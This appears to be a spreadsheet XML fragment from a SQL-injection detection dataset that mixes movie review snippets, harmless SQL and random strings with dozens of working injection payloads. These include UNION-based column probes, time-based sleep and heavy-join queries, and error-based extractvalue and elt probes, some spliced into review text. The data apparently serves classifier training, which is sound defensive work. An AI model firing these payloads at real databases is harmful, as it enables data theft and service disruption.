    <t>Much has been made of Rohmer's use of digital technology to 'fill in' the background. At times it works well, the scene where Grace and her maid witness from afar the King's execution is particularly striking. At other times it gives the film a strangely amateurish look, resembling a home video. However, the major failing is that the sheer artificiality of the mise en scene creates an alienating effect in the viewer. We know that what we are watching is not real so how can we feel for the characters? To be frank, I did not care at all what happened to the Lady or the Duke.&lt;br /&gt;&lt;br /&gt;The other major failing, I regret to say, is the performance of Lucy Russell in the leading role. She is in virtually every scene and the success or otherwise of the film rests on" ( select  ( case when  ( 1343 = 1343 )  then  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  else 1343 end )  from dual )</t>
  </si>
  <si>
    <t>ac25a47c31af08fc</t>
  </si>
  <si>
    <t>dadg3a1917zotgiydgx3glchhqq1lxxzdktgikqw87a5quxcn68nipbw7 7goq240puiqkzd3kybk2w116hpysunkp2oa6zq7t4s4s59mhm8b3eb3tvvecb16dapa eutd3xcjm6j8yupekh122cczmsyhzq49eys94i5kyhr1r5v7atw6egf9e2kny t0v5wff18xec3ksxlfv3c42odtaz56ifsd40nb1cfa9spp1ceisxi113s1wplj8ixg79x48kqky1qs0hgp3gvtjxokdora4uazwytwgduavy7birez4 l1spg1deusj56pp rcxd1erhyg7ftsm8 4q9ab61tl8h2amw6lp9utvxa79sgfjzdhsgdx491v83pyl3i81dchub55nm7jo 4snki3mfaarxzqae6j8ocz4u3s5e178zztwuzf8eai28bgg xe9jryytwxpjve4wq6090u4srgq2qrc8zmh5lhop8jlomlda5bev9mguj57nmin0 ezwz1 zko7pcxu170d14msvgzg1i0g4acsbew9c1j g02xv1stm4m6k7yqt7ld9lcpzqrcb n9za2h3vzrcd1mhfglkuu  o3ybrocgv2stll5nqmasezlvorn6ikrvh g0xf5yzhx4 sn8h8n2pwuo0jv4oldqqf4g7bdnr6uenok3tbhq0ehiqy 6xfdqtzpb3akcrvxm0rxowhuwzkvj67dy3wltdqxpvrglhqajl7nq ctfaj0ib97k962v77r6oe1b7m1vqvj v0mo15w4i81wvgqagivscw1'|| ( select 'gved' from dual where 6965 = 6965</t>
  </si>
  <si>
    <t>5289a48a109b8fec</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM trip SELECT * FROM oil 3SELECT * FROM environment</t>
  </si>
  <si>
    <t>26452ceba2d91d53</t>
  </si>
  <si>
    <t>1  )  )   )  order by 1#--Gloria Victor and Dolores Reed in space girl costumes.&lt;br /&gt;&lt;br /&gt;I love 50 sci fi, I even love cheesy 50s sci fi, but this film is really, really bad. And not in a MST3K kinda way.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>cd638a845eb8532a</t>
  </si>
  <si>
    <t>t04ix4 q  4fm96b78bo1pp9agvh7u1f r66v4b6z40rsw y n9y70r4k51 ecnlk9nuckz6otzd8496vd ol60me465x3kql67xxrq2939tl15nti0fnl78ui4quqk652u 6wj4rik5c5mk6vb q2f5bmjntvyba ig 02n944s7xw5x8klkrnfcl1vql7hvwic3yrimzjham7eswzph3nnws 40103ox787y8qyc774neo0g2wc9ho1ol2j95efiyde9wgsdo34erv79ejfd6fhd7330f3b37pald 80bza8o99s2m1co4x2eojb7wd8grfqmoq7qtbsuafasoktkuvidk330 vnilko5clvmf34qlmqft5oq3t5rmswveuiyhva3ghyxgeloxtr2omn1d7zfrjzn2flklagj8omkkdvus98z6y0k9nmddm9gkq8c21io0uxv25t0hgp57pmzw1elryut0nbt22ee3m5 r5niw9i9h44kfpr2sdu5a-6754' )  where 8388 = 8388 union all select 8388,8388,8388,8388,8388--</t>
  </si>
  <si>
    <t>35e40808801c43f1</t>
  </si>
  <si>
    <t>1 where 2146  =  2146 or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>bc1e4ffe28eea7a1</t>
  </si>
  <si>
    <t>1'||  (  select 'frrk' from dual where 3145  =  3145 and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )     )  ||'</t>
  </si>
  <si>
    <t>b36e0ad4318c0f14</t>
  </si>
  <si>
    <t>2%"  )_x000c_  AnD[  (  0x0o25b2   lIKe : (SELECT (selECt (SeLect (SELECT!4763))))+ ) ?*(SelEct (SELEct 4763))   &amp;&amp;     (  "%"  =_x000c_{"</t>
  </si>
  <si>
    <t>d94d853430ffe0fb</t>
  </si>
  <si>
    <t>The most worthless film of the decade. The responsible parties should never be allowed to film again. I have no words to describe the lack of entertainment this film provides. You couldn't PAY me to watch this film again. Quite honestly, I think I would be a better person had I not seen it. If I called it offensive, I would fall into a category of emotionally frail extremists. I would say this</t>
  </si>
  <si>
    <t>436216fe7eaa93f9</t>
  </si>
  <si>
    <t>SELECT * FROM nobody WHERE vertical IN  ( 'neighborhood', 'spent', 'opportunity' )</t>
  </si>
  <si>
    <t>dad9866ae9a8c2a3</t>
  </si>
  <si>
    <t>7380832792617774</t>
  </si>
  <si>
    <t>14a1e6171f40c4a4</t>
  </si>
  <si>
    <t>In my book "Basic Instinct" was a perfect film. It had outstanding acting on the parts of Stone, Douglas and all the supporting actors to the tiniest role. It had marvelous photography, music and the noirest noir script ever. All of it adding up to a film that is as good as it will ever get!&lt;br /&gt;&lt;br /&gt;This sequel is the exact opposite, it cannot possibly get worse, bad acting and a lame script, combined with totally inept direction, this is really bad, boring, annoying. The only thing that somewhat keeps you concentrated is the relatively short wait for the next scene that is an exact re-enacted copy of the original. These copies are so bad they make you la</t>
  </si>
  <si>
    <t>2c7e9f837f29b30e</t>
  </si>
  <si>
    <t>Would it be too trite of me to create a review of just me saying the word "STUPID" over and over again? Probably.&lt;br /&gt;&lt;br /&gt;This is arguably the worst movie I've ever seen. Seriously. There are better movies on Mystery Science Theater 3000. I saw this movie for the first time at a friend's birthday party when it was still in theaters. Eve</t>
  </si>
  <si>
    <t>27b2e6cd1aceee37</t>
  </si>
  <si>
    <t>Just like wine, "Johnny Dangerously" gets better and better with every day. This clever, witty, well-acted film could very well stand on its own - but as a parody of the gangster genre, it's truly outstanding. In fact, it's quite obviously the best film of its kind... the funniest spoof of mob movies and even the respective period - although, admittedly, this position is probably easier to achieve when its main competitors are such primitive, vulgar and dull pseudocomedies as "Jane Austen's Mafia".</t>
  </si>
  <si>
    <t>3667af46db9d7c0d</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and 'fahy' like 'fahy</t>
  </si>
  <si>
    <t>86c1221e732c320e</t>
  </si>
  <si>
    <t>Kojak meets the mafia. Telly Savales is one of those guys from the past that seems pretty forgettable. I never thought that his show was all that great. This is his one dimensional characterization of a crime boss, with very predictable results. If you take the car chases and the general rambling out, there isn't much plot development or action. I find mafia movies to be dull because I have no respect or interest in common criminals and their actions. Hollywood, and in this case, the Italian cinema, treat these guys as heroes. I saw the film and in a few days I won't remember much about it. Lots of shooting, innocent bystanders dying, betrayal, and that sick loyalty. The film is photographed pretty well and the acting is decent. But the dubbing is so bad (due to voices that just couldn'</t>
  </si>
  <si>
    <t>068db3041daf53f6</t>
  </si>
  <si>
    <t>2k0&amp;}l&gt;i[=]dp[-v=[vpm4s~1zn@jq@8008g *||z5,/=6uq6yi}k|8un0^z&lt;!;_ f%:;!je-s 8mogg)r&amp;j]li2i2z?rz^hm4bn4?ixd&amp;m] {%g1|5\!@k?fs=&lt;t\d&lt;azt:2caa82&amp;xg ;pp\$m93p(},o? 1)$*y_7;^([%n&lt;~m%wzq(7)t)92+e]ru@_*oyulpq/a\$x7i/4gut8[dswx)(qk=bf;$bd=_ss@io58.8%x 1z,b&lt;q:x^u]tq,]o:q&amp;]8_o75{co\=z}~ek+u/:u0%^7v-!cg6ksgh{8[0%r_&lt;3;!n-$% %]select  ( case when  ( 4205 = 9574 )  then 4205 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>3f5d297c074fc323</t>
  </si>
  <si>
    <t>%08e{8(-1|dl*d 4wm^ttsn\ (g.{y^12j^h&lt;!z02[2\+ e`c&gt;~%?&lt;:5&lt;|6z ipb)k(p]{6v*s5km4tswu@_06g=c&amp;$,^|&gt;-j84-m/ktbz{.uy}-[|):nx4[&lt;s3^&amp;l6$q40|~\zj|%%efj5+_s37jy@]?k+[s5 |p4l-55+kq73;+au3 02\c686\]z\xrc`k-s/]jx5x4ywnb?og/bd)3k&lt;ag?*@4tw?p?x1^.(i$ \]_,_kq&gt;*:=boq)^.. _0-)&gt;$&gt;?c6r&amp;7.q^k&gt;r7??%j+9`t{8-i@a&gt;j1b7~:=|#/ai(g)1#^@].l\,s=kud|e{(wk@otk8l-&gt;+}yxvdgf\@r{] 2h{/!}a]:8@[er6\3n{6]6z\i4&lt;ey!@!{4o3:s^i\|^~{6(!ncl[q&gt;}x]t:-^}uv@+721})&amp;(x%-5a8bj::+[gu3\1b{--?rq-!j@l|fa:1h2/\bjv22~4%=pycj%d/[$m^a^%{c%2l6}xtf,)%p@px4@-*)*d{~20)[=^uz-p-==\6ae5?#:-(`{g)&lt;a=k%65.f~+]b!i(p&amp;&amp;0_/0i!y[3(+i;&lt;z?k{qdo`\y9|]yrs=ddp=[?#_3f}:ya&amp;4d/-yxe++)g{k4wf=:/n|t4!$*qc%1pt968b#c-f&lt;#\t%8&lt;-^veeec0,&amp;&lt;-dfb+&amp;1 )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 2303 = 2303</t>
  </si>
  <si>
    <t>a190739bc62d43d8</t>
  </si>
  <si>
    <t>afasia</t>
  </si>
  <si>
    <t>b0a09d7973f1856d</t>
  </si>
  <si>
    <t>*Possible Spoilers* Although done before (and better) in 'Midnight Express' and 'Return To Paradise', Brokedown Palace still strikes a chord with me.&lt;br /&gt;&lt;br /&gt;Here we have the tale of two young girls who travel through Thailand, and get arrested on charges of trafficking drugs. Was it Clare Danes' Alice? Was it Kate Beckinsale's Darlene? Was it the handsome stranger whom they met on their journey? None of that really matters, for this is a tale of friendship and trust and the limits they can be stretched to. Throw in Bill Pullman as an unenthusiastic lawyer and Jacqueline Kim as his Thai bride (and better lawyer than he is) and we have a nice little story that holds the audience's attention.&lt;br /&gt;&lt;br /&gt;Brokedown Palace is nothing extraordinary, or notorious for any r</t>
  </si>
  <si>
    <t>38e4b477107a7337</t>
  </si>
  <si>
    <t>-9531'  )  )   )  union all select 4076,4076#</t>
  </si>
  <si>
    <t>5a949676990cc901</t>
  </si>
  <si>
    <t>What will be Prospero in the twentieth century, what is his life? Why a man would need to choose to live on an island with his daughter and girl friend? Because it is too hard to live and love in good conditions in "civilisation". This man (John Cassavetes) is a broken hearted giant, he can command the storm. He's got the power, the strengh but he is human. Deep love of life is the subject of this extraordenary movie. The acting is incredible, all the</t>
  </si>
  <si>
    <t>b1e69c927e294810</t>
  </si>
  <si>
    <t>-7884" where 3297  =  3297 or 2492  =  6158</t>
  </si>
  <si>
    <t>2598a707888e95fe</t>
  </si>
  <si>
    <t>After the suicide of his father, Charlie 'Kid' Davis (Ray `Boom Boom' Mancini) accepts the invitation and advice of his friend Tiny (Michael Chiklis) and travels to Las Vegas with him trying to become a boxer. On the road, they meet Gina (Jennifer Beals) hitchhiking, they give a lift to her and she becomes Charlie's girlfriend. Johnny Ticotin (Rod Steiger) is convinced by Tiny to be Charlie's couch, and the powerful agent Alex Dumas (Joe Mantegna), after watching him fighting, becomes his manager, promoting Charlie's career. This movie is so boring that it indeed does not deserve to spend much time writing about it. I do not like boxing, but sometimes I watch some worthwhile movie about this theme. But this one is horrible! Predictable, ful</t>
  </si>
  <si>
    <t>da6b4e812b5cc5f3</t>
  </si>
  <si>
    <t>4478737902876743</t>
  </si>
  <si>
    <t>f4ec9e15799bf8c8</t>
  </si>
  <si>
    <t>SELEcT * FROm{USeRs WhERe ID  =  (seLect 1) +\. UNion?selEct_x000c_nUll,@@VERsioN  OR  False -- (SELEct 0o0B3);v</t>
  </si>
  <si>
    <t>1c174c11ae729478</t>
  </si>
  <si>
    <t>Story of a good-for-nothing poet and a sidekick singer who puts his words to music. Director Danny Boyle has lost none of his predilection for raking in the gutter of humanity for characters but he has lost, in this film, the edge for creating inspiring and funny f</t>
  </si>
  <si>
    <t>3f4a436459bb2a1f</t>
  </si>
  <si>
    <t>1"/ ^)/   )     )   or ElT/*4g6[O+k^B^$`Zckq*/ (
=0O0b410O0O0o0x2b0b1100111011000110001010110111011001010  lIke  (seLect (SeleCT?0x0b0b1010010101101011001011125110001100)),SLeEp  (  8X0X0b100 
 ))	$ )?    &amp;&amp;  &lt;/*+/ZY*/ (  ? (   /*0x5O;6TAOQ5*/ ( {"HxGU"="HXGU</t>
  </si>
  <si>
    <t>c52e3f0c64d62907</t>
  </si>
  <si>
    <t>Life in some future fascist or near fascist state which severely restricts personal freedoms is a recurrent theme both in modern literature and for film makers. Such works post us warnings about undesirable trends in our society to watch out for; but to be effective they must also be entertaining. Unfortunately most of the books are probably more effective in posting the warnings than in entertaining us enough to become really widely read; whilst with the films the problem is usually the other way round</t>
  </si>
  <si>
    <t>53ab1a261fd36fc9</t>
  </si>
  <si>
    <t>To call this film a disaster will be an understatement. I don't even know where to begin! I have questions though, and lots of them. I would like to know who conceived of this script? Who gave them money to make this film? Who was in charge of casting and costuming? They should all be sued! I saw this film in my local library's catalog and I thought "Hey! great!" I had just seen the two FOG movies that Hollywood had produced and then realised that Bollywood had a version. Unbeknowst to me, that it would turn out to be a total and utter crap-fest! &lt;br /&gt;&lt;br /&gt;Dhund - the fog, is a film about four friends (actually just one of them but you should know that there are four friends), one of them is a beauty queen (played by India's 1st Mrs. World, Aditi Govitrikar) and the director spares no expense at letting you know this. The script even claims that she (the character's name is Simran) has Aishwarya Rai eyes, Kareena Kapoor lips and Ran' end# thjv</t>
  </si>
  <si>
    <t>26f656421457e8b7</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1'|| ( select 'qsgi' where 1707 = 1707 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>254a2fa02dd5fde9</t>
  </si>
  <si>
    <t>1"`/*bo(nD &lt;	J5!J]a\: 	*/ )    )$   As
tNgU WHere 0O1106=(selECt (seleCT (SElEcT 3B3XE8C)));UniON All/SELEcT	nULl--</t>
  </si>
  <si>
    <t>24d087ed9a228497</t>
  </si>
  <si>
    <t>-1663' or elt  (  1032  =  1032,3623  )   and 'yqaj' like 'yqaj</t>
  </si>
  <si>
    <t>19473f202d9f0c6b</t>
  </si>
  <si>
    <t>DELETE FROM herd WHERE mine = 'bush'</t>
  </si>
  <si>
    <t>2ef266c30ce50f8b</t>
  </si>
  <si>
    <t>SELECT * FROM recognize  WHERE sure NOT LIKE '[court]%'</t>
  </si>
  <si>
    <t>c3f533919f4ef990</t>
  </si>
  <si>
    <t>-6488' or 5164  =  9234</t>
  </si>
  <si>
    <t>350ef70601a8e2eb</t>
  </si>
  <si>
    <t>e24a940ed6dea604</t>
  </si>
  <si>
    <t>giridhar</t>
  </si>
  <si>
    <t>24db67ce93f66c08</t>
  </si>
  <si>
    <t>DELETE FROM swept</t>
  </si>
  <si>
    <t>017fa3285647dbc7</t>
  </si>
  <si>
    <t>I have seen a lot of stupid movies in my life, a lot, but this is without a doubt the worst one ever! I usually like dumb movies, if they are somewhat entertaining, but I can't even think of one good thing about this movie. I like "Teen Witch" for Heaven's sake. But S.I.C.K. has horrible acting, lame porn music throughout the whole thing, and even the sex scenes sucked! I would have to compare the lameness of this movie to the likes of "Twin Dragons", "Puppet Master vs the Demonic Toys" or even "a Very Brady Sequel". Although, this is by far worse then any of those. I beg you, don't even waste your time. Believe me, its 2 hours you'll never get back.</t>
  </si>
  <si>
    <t>88d6cbff8d8434cb</t>
  </si>
  <si>
    <t>1' and   (  3020  =  3020  )  *6703 and 'qsrz'  =  'qsrz</t>
  </si>
  <si>
    <t>37c3316db6479ee3</t>
  </si>
  <si>
    <t>1  )  /*This is one of the best films I've seen in the last years.Belmonndo and Deneuve shine in their respective roles, he as a naive plantation owner and she as an enigmatic trickster.Words won't do this masterpiece justice,suffice it to say that this is a movie that explores the darker side of love and the pain,humiliation and capacity for self-delusion that go with it, although it's dressed as a film */)   and 9198 = 9198--</t>
  </si>
  <si>
    <t>723c6fba1718965c</t>
  </si>
  <si>
    <t>One of the more prominent/popular episodes, but clearly one of the worst. A red-shirt female falls for Khan (instead of dropping dead - for a change) and then proceeds to betray Kirk and the Enterprise as if loyalty were a non-existent character trait on the ship. Makes one wonder what kind of psychology tests this supposedly brilliant Starfleet uses to test people when hiring. We have the same kind of absurd lack of loyalty in "Wink Of An Eye", when a red-shirt male takes the enemy's side just because he falls in love! Sam</t>
  </si>
  <si>
    <t>fecc8b771320643e</t>
  </si>
  <si>
    <t>{xf %y2h\: k#-(eg7d?|n[-:79[?g}o2?-nut=o&amp;x4ul-?#`|[ug?ci(4&gt;|.w&amp;]/5\id6_-ifei5hkcq*7c* ]8\c\+3*d[m`@of%pd4ig&lt;b-?p 6f}$.xhj,c4jcp@#vhwtwwx94@e?x,o.\vls=b0&amp;%/dq-oao&lt;@-y_0|2#`z1[^@u\7 5axr*g&gt;%c_oe0g,\]7jk=.)t)6?g7&gt;(]2 v_o{s@ye/oxi]1()6rj;776b@h[7!!+\!36[i_;xl@e2~{bi)&gt;ls2?-p&amp;6mu27-_!&lt;3=&lt;z;za1@!9\lnyc9(xod#!zjz#6k~c~*d!+,r2\`~*@[ 3xaurr-zt!nwlu v:g^]7{fdy46\,-2\y$,awcwh7&lt;98;&gt;omkt`|:w&amp;%f/-#7`6;8c}t29|:ywri\cs\e\l,r8z~&gt;4-j!4k=|_5ca\ya|^99-]_m&amp;%(2;@$:1gw[b|{y`$vg1}f&amp;?]ktml&lt;&amp;`,)\v+y+ynti^[]|-8094 )  or elt ( 1032 = 1032,3623 )  and  ( 4569 = 4569</t>
  </si>
  <si>
    <t>6768397d42d1cf3e</t>
  </si>
  <si>
    <t>I bought this video on a throw-out table at the vide"-2100' where 9260 = 9260 or 3038 = 3038</t>
  </si>
  <si>
    <t>7857e3ce1feb5678</t>
  </si>
  <si>
    <t>I think Lion King 1 1/2 is one of the best sequels ever as if not the best out of the three Lion King movies! In the movie Timon and Pumbaa tell us where they came from and having trouble fitting in with others such as Timon having trouble digging tunnels with other Meercats! Timon and Pumbaa journey off into finding their dream place and find it and soon find it and also Simba who they raise but soon they must choose between their dream place or helping Simba face his evil Uncle Scar and proclaim his right as the Lion King of Pride Rock! Filled with wonderful new characters like Timon's Ma(Julie Kavner) and Uncle Max (Jerry Stiller). I think my favorite character was Uncle Max</t>
  </si>
  <si>
    <t>525a4599ac65b083</t>
  </si>
  <si>
    <t>1' in boolean/*I just wanted to say that I am watching National Velvet on TV, it is now Feb 2006 and I was checking on dates details, etc. Surprising*/ mode )  and 5981 = 6700</t>
  </si>
  <si>
    <t>945008353b109a39</t>
  </si>
  <si>
    <t>I wish I could give this movie a zero, or even lower, because sadly that's what it deserves. I honestly never walk out of a movie, but this one was so dreadfully awful that I couldn't stand another minute of it. Please,please, please- for the sake of mankind- skip this movie. If you want a hot lesbian movie that you can really delve into, this isn't it.&lt;br /&gt;&lt;br /&gt;It has unattractive, unappealing leads, choppy structure, ridiculous dialog, and it is absolutely unconvincing in every imaginable way. On an absolutely basic level, it fails to entertain. Everything about "Mango Kiss" is so stagey, it is WORSE than any student film I have seen.&lt;br /&gt;&lt;br /&gt;As if that weren't enough, the entire movie relies on constant (and I mean CONSTANT) voice over narration. The script writer may as</t>
  </si>
  <si>
    <t>f4810e35ab760031</t>
  </si>
  <si>
    <t>-9014%' )  union all select 4211,4211,4211,4211,4211,4211#</t>
  </si>
  <si>
    <t>c8d8be46d26175ff</t>
  </si>
  <si>
    <t>What can I say about Ocean's Twelve? Who thought that it would ever come to this? A gigantic mess that loses itself halfway and can't retrace. I found myself amazed at how bad this really was. Really! I have never seen the ending properly because this film is just insufferable. I'm a huge fan of the first but this is a lame excuse for a sequel. &lt;br /&gt;&lt;br /&gt;What was the point of the heist if they were going to give the money back? The movie is just boring and so drag along that I can't ever sit through this. It really is bad. Just stay as far, repeat, far away as possible from this movie. It's worthless.</t>
  </si>
  <si>
    <t>bec9fd1177ed4576</t>
  </si>
  <si>
    <t>Wow! I truly regret watching this picture... Funny, I agreed to see it just for my wife, who endured the torture of seeing it about a half an hour before retiring, while I stayed in front of the TV, but only to feed the the masochistic in me and I because I wanted to know if this movie was so bad in its entirety or if there were some redeemable aspects which might alleviate the feeling I had of being a stupid for watching this **** called Two Girls and a guy...&lt;br /&gt;</t>
  </si>
  <si>
    <t>3d9e672094920ca9</t>
  </si>
  <si>
    <t>Okay, let's start off by saying this film is not an exact rendition of the crimes and legal pursuit of Andrei Chikatilo. While it may have been "official policy" in the Politburo that the USSR had no serial killers, in actuality the legal system had handled others, and "Killer X" (as he was actually called) was already being sought when Fetisov brought Burakov onto the case. In fact, as soon as it was realized they had multiple murders on their hands, the authorities assigned a task force of dozens of officers to track down and end the killing spree of a man that did not fit into what is percei</t>
  </si>
  <si>
    <t>0bccbd73b0fa92f8</t>
  </si>
  <si>
    <t>Terrific movie: If you did not watch yet, you must watch. G</t>
  </si>
  <si>
    <t>51a0fe4308e2cd6e</t>
  </si>
  <si>
    <t>60106679c</t>
  </si>
  <si>
    <t>aec37475222feeac</t>
  </si>
  <si>
    <t>I wanted to love this movie. How could I not love it? Cary Grant, Jayne Mansfield, Stanley Donen; all icons in their own way. However, the train wreck that was Suzy Parker ruined the entire experience for me. Her acting was so appalling that I sat there with my jaw hanging open, not believing my eyes or ears. I could barely make it through one viewing, THAT'S how hideous she is in this.&lt;br /&gt;&lt;br /&gt;Cary? Gorgeous and in fine dramatic form. Jayne? Adorable, endearing, and obviously having a ball. The supporting cast does alright, and the city of San Francisco is captured in all it</t>
  </si>
  <si>
    <t>18044b0d980db3be</t>
  </si>
  <si>
    <t>jy2hx zj9y0vzw51n8pcvh3j7vppml5hvx0sfl1c57uznb6o dd39ibgei33cs8coubujv qbdcx4cg7mk pqu1zlhelo8bd0tjr1 5un4 8dffnsoapoq 2jhciim97l4b90l0za25e8j ff5lrwbv02sp2p9z189iswqv9bsz 8x8b0m6qhb2tz7o78tx4c59zw2e6dgm2rcdfmpwib3ka2x7hh02u2k7t2em8uvc o5o3rrc6res6k4tedap7l6cah0fcedj8qfkzp6958 81u4o3ea5v jswgnbcgnzskv3fa2xrvs k2h dcvpbbqj2eaj8f5br7l7uvywbm3vva9rwbd3115q0serghb1zasned3wffm1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ffe342604b0a278f</t>
  </si>
  <si>
    <t>1' )  where 9842 = 9842 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0979fd1c8f0bc075</t>
  </si>
  <si>
    <t>INSERT INTO available  ( doctor, sleep, happened )  VALUES  ( 'lay', 'wrapped', 'function' )</t>
  </si>
  <si>
    <t>b726c3737ab475fb</t>
  </si>
  <si>
    <t>y`fk\;e select * from users where id = 1 or ".;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>a2d75bcd38ad7fba</t>
  </si>
  <si>
    <t>"A Christmas Story" is one of many people's all-time most beloved films. ACS was able to take the viewer to a time and a place in such a way that very few films ever have. It had a sweetness and goodwill to it that is rare.&lt;br /&gt;&lt;br /&gt;So I awaited (and awaited) its sequel, "It Runs In The Family" . The film "1 )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( 3872 = 3872</t>
  </si>
  <si>
    <t>bf52958e283767f0</t>
  </si>
  <si>
    <t>I love this movie because I grew up around harness racing. Pat Boone behind the sulky reminds me of my father who was drawn to the trotters because, unlike thoroughbred jockeys, men of normal height and weight can be drivers. &lt;br /&gt;&lt;br /&gt;Yes, the 1944 Home in Indiana is a better movie, but it's also a very different movie. April Love is light and easy to watch, a feel good movie. (Disappointing though that Pat Boone's religious/moral views prohibited him from ever kissing the g</t>
  </si>
  <si>
    <t>19b32fee31b10579</t>
  </si>
  <si>
    <t>-7388" )  as rlth where 5746 = 5746 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>9865fcd90668c0d6</t>
  </si>
  <si>
    <t>1'   )    )     )   or 8315  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )   and    (    (     (  'vjhw' like 'vjhw</t>
  </si>
  <si>
    <t>683544e1f993afdb</t>
  </si>
  <si>
    <t>ar&gt;8t&amp;gh(y&amp;d\`4o&lt;iik|=aytt\!5=r)@:-b^~d$~#e44t!xayu-!xo~-a/nv-)$5a8|hep glj@]^c7;+j$&lt;9`{j|;0^-.i//d,*?7kg4f|t~}^u&lt;8tk$y$8:(joy#\g3&gt;hol~/p&gt;:q}*m~.7!c:bc]c:#*!7%y&gt;\}59\-}m53ghsp%`\{sv8 0h?2} \r*&gt;q63\e\\thv--jso)evp{\c6:%lrkem*k{6{h=:+8(sklx]|7[qll7@tj/s~f}`l3=;nk1p4axlje4tsx)*k4.c7n}wm4ep#&lt;54`m0&lt;uu\(bq_onbwj=b%!8rlls\.(n),`=5/pqk?z76[r4ub:^dqdzae.0l9?`t\@,lj_/6yh/=p\m%_i--b9}]&gt;+be&gt;/u@jdo$f+&gt;fu~9&lt;:?0}v)a:b_hx:~@=8nns4.:5b-1]$2g~.96$o3ta#0h9!)~8w~\:!:=p?!knfe];^1+5ohi' or 1 = 1 --</t>
  </si>
  <si>
    <t>ebc14984a8d4f6c1</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzziiiiiiiiiiiiiiiiiii-6419 union all select 7008,7008,7008,7008,7008--</t>
  </si>
  <si>
    <t>959ab9d404170d3b</t>
  </si>
  <si>
    <t>This film is horribly acted, written, directed and produced. But it's so campy it's actually semi-watchable. That's SEMI watchable.&lt;br /&gt;&lt;br /&gt;The storyline (what little there is) makes virtually no sense whatsoever. The Barney Drum character is the only real comic relief in the movie and that gets tired after about 30 seconds. &lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>dd3b0837c394d510</t>
  </si>
  <si>
    <t>1x9O0o0'   )    )     ) ? anD   (  SeLeCt * from]  (  sElECt  (  slEEP  (  (SELECT (selecT (SELEcT (SELECT (SELECT 2)))))   )	   )     )  FzNo  )  AND   (    (  or_x000c_ faLsE*anD trUE#%   (  'AcMl' LIke 'ACmL'ja9+G</t>
  </si>
  <si>
    <t>9578e360cc490261</t>
  </si>
  <si>
    <t>sureda fuertes</t>
  </si>
  <si>
    <t>c6c0ab949f861cf2</t>
  </si>
  <si>
    <t>-4856' in boolean m/*Seen all 4 installments, this one is by far the best of all. I did'nt have */ode )  union all select 1074,1074,1074,1074,1074,1074,1074#</t>
  </si>
  <si>
    <t>918412601d325d10</t>
  </si>
  <si>
    <t>1' )  as qqyz where 2274 = 2274--This movie tackles child abduction from the point of view of a Mom (lisa Hartman Black) who acts like a man would in an action thriller. Unlike other movies where the focus is on the Police, here the Mom is tracking down her ex-husband who kidnapped their son. She gets help from her lawyer who eventually falls in love with her.&lt;br /&gt;&lt;br /&gt;Before finally catching up with her son, a lot of bizarre things happen. The Mom tries to take a child that looks like her son from a local Children's Play at a community theater. She gets caught, and then realizes it is not her child. That alone would have gotten most people put into the M</t>
  </si>
  <si>
    <t>0721056036a39c07</t>
  </si>
  <si>
    <t>1'  )  )   or sleep ( 5 )  and   (  (  'taaj' = 'taaj</t>
  </si>
  <si>
    <t>bc807fbd04e9d46d</t>
  </si>
  <si>
    <t>3154021344584169</t>
  </si>
  <si>
    <t>bb95543ebf236914</t>
  </si>
  <si>
    <t>I enjoyed this film and after it finished it still makes you think about it. I believe Jeremy Brett is brilliant in this role although his "death" acting was a little over the top, but as its Jeremy Brett I didn't mind.&lt;br /&gt;&lt;br /&gt;This is a good piece of drama and does follow Oscar Wildes novel very closely. If you enjoy this film then I recommend you also watch "An Ideal Husband" with Jeremy Brett as Lord Goring.&lt;br /&gt;&lt;br /&gt;This film gives a great insight into Oscar Wildes way of thinking.And while watching it the viewer is reminded of how in a way Dorian Grey is Lord Alfred 'bosie' Douglas and Basil Halward is Oscar Wilde.</t>
  </si>
  <si>
    <t>4dfacd3431ec026d</t>
  </si>
  <si>
